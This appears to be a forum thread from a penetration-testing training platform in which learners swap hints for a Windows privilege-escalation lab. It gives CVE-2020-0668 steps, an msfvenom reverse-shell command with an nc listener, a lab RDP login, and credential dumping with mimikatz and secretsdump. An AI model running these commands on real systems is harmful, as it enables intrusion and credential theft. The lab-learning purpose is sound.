Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop. Trying for a long time | Tried many exploits, nothing seems to work.
Any hint?
Ok, so just read this if you are really really trapped and since nobody was replying.
To get privilege escalation there is a section that explains how to use CVE-2020-0668.
Since I was not able to "build" the ".exe" file from the source, what I just did was download the .exe files provided in the section machine that explains that CVE onto my Linux machine, re-spawn the Skill Assessment Part II machine and pass the .exe files. You can easily do this by sharing the "/tmp" folder from our attacker machine with the Windows target machine using:
xfreerdp /v:<target-ip> /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:linux,/tmp
so you have a "shared" folder between our Linux attacker machine and Windows target machine.
You can follow the steps as the Academy teaches.
However, when you try to get Meterpreter reverse shell, at least for me, I got the following error when I use commands:
[-] Error running command getuid: Rex::TimeoutError Send timed out
So, for this reason, instead of generating a malicious binary that uses Meterpreter, just do it the old-fashioned way and create a simple .exe reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp lhost=<your attacker ip> lport=<your listening port> -f exe > ma****.exe
and, before starting the "infected" service, just remember to run nc:
nc -lvnp <listening port>
To get the system network user password (which could be used in other circumstances for pivoting), you have two options:
- Use mimikatz.exe
- Using our privileged reverse shell, add our user to the Administrators group ("net localgroup Administrators htb-student /add"), use secretsdump.py (do NOT use "just-dc" flags) and crack the hashes with your favorite tool
Happy hacking
oh sorry guys, I already finished the assessment II while above. The above text is a hint that others asked me before
the steps given to accomplish the task given by @GunZF0x are fair enough and precise… please if you can further elaborate the issue you are facing
Yes, follow these steps and get the executable from the previous module, it will make your life easier. Also msfconsole has a module but it doesn't work for some reason in this lab so don't waste time with it
Just my 2 cents on this exercise:
Thanks so much! This has saved me a good chunk of time… It feels like they've added these skill assessments to mess with us and get us thinking outside the box. It's a bit much sometimes
The first question to find the cleartext password for the iamtheadministrator account was the hardest for me.
There is good advice in here on how to do it. WinPEAS or SharpUp.exe will get you to where you need to go.
But it won't put it right in your face. You may need to look in something.
Anyway, this was a good lab and a great example of why you shouldn't just leave passwords *cough* unattended *cough*
The method mentioned above is A way to go about the box, but is not the intended way. The intended way IS MUCH easier than you're making it. Hindsight is 2020 because it took me an entire day to figure it out.
When you run SharpUp.exe, you have everything you need to solve this.
Hint: POWERUP doesn't work on this box. But it is very easily searchable on how to exploit the vulnerability which is staring you right in the face.
That's the best way to go about it
thanks for the note. This helped me a lot.
Hello, I've been able to escalate privilege using [CVE-2020-0668] and complete the module, but I realized that once I have the reverse shell established using meterpreter, it works only a few seconds. That allowed me to effectively run one or two commands. But after a few seconds, the remote console stopped responding and alerted with a timeout. I had to establish it again, but only for those few seconds. This was enough to complete the module, but is there somebody here who faced a similar issue and can advise how to solve it?
Does this also work for the netlab module?
There are multiple ways to pwn this machine. But I'm pretty sure the intended one has to do with "Elevation".
The exploit can be automated using metasploit. Try running the Suggester Module and you'll figure it out from there.
I faced the same error but after reading your post I realized that I used wrong payloads in Metasploit: windows/x64/meterpreter/reverse_shell instead of windows/x64/meterpreter/reverse_https
Using the correct one gives me a brilliant shell
How did you build .sln in vs code to create the payload?
Hello, please, I tried every way, no solution. Can you help me please?
I need help with the first question please, I tried every way but do not see it
The content of section Credential Hunting may assist you with that.
Please give me a hint
I don't understand the last question.
There is 1 disabled local admin user on this system with a weak password that may be used to access other systems in the network and is worth reporting to the client. After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.
I have already escalated privileges using MSI, dumped the SAM, re-obtained SYSTEM privileges using Pass-the-Hash, and executed mimikatz, but I don't know where to get the NTLM hash. LNK phishing for NTLMv2?
Anyway, why is HTB asking us to crack the NTLM hash when we already have SYSTEM privileges?